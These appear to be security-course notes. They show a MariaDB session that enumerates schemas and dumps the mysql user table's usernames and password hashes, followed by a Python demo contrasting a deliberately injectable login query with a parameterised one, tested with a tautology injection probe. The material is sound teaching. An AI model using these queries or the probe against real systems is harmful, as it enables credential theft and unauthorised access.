
MariaDB [(none)]> show databases;

MariaDB [(none)]> use information_schema;

MariaDB [information_schema]> show tables;

MariaDB [information_schema]> use mysql

MariaDB [mysql]> show databases;

MariaDB [mysql]> show tables;

MariaDB [mysql]> show columns from user;

MariaDB [mysql]> select user,password from user;
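An added example, not from the course notes, showing the root cause that the chapter tests for: the same login lookup written with string formatting (injectable) and with bound parameters (safe), run against a constructed in-memory SQLite table. The table rows and the probe string are constructed; the user table and column names are assumptions.

```python
# Added example (not part of the course notes): the same login lookup written
# the injectable way (string formatting) and the safe way (bound parameters),
# run against a constructed in-memory SQLite table. Passwords are stored in
# clear only to keep the demo short; real systems store hashes (see Hashing).
import sqlite3

def make_db() -> sqlite3.Connection:
    """Throwaway users table with constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (name TEXT, password TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn

def login_vulnerable(conn: sqlite3.Connection, name: str, password: str) -> bool:
    """Query built by string formatting: user input becomes SQL syntax."""
    sql = (f"SELECT COUNT(*) FROM user WHERE name = '{name}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone()[0] > 0

def login_safe(conn: sqlite3.Connection, name: str, password: str) -> bool:
    """Same query with bound parameters: input is only ever data."""
    sql = "SELECT COUNT(*) FROM user WHERE name = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchone()[0] > 0

# Constructed tautology probe used to show the difference.
PROBE = "' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "alice", PROBE))  # True: the WHERE clause was rewritten
    print(login_safe(db, "alice", PROBE))        # False: the probe is just a wrong password
```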



***********************************************************************************************************
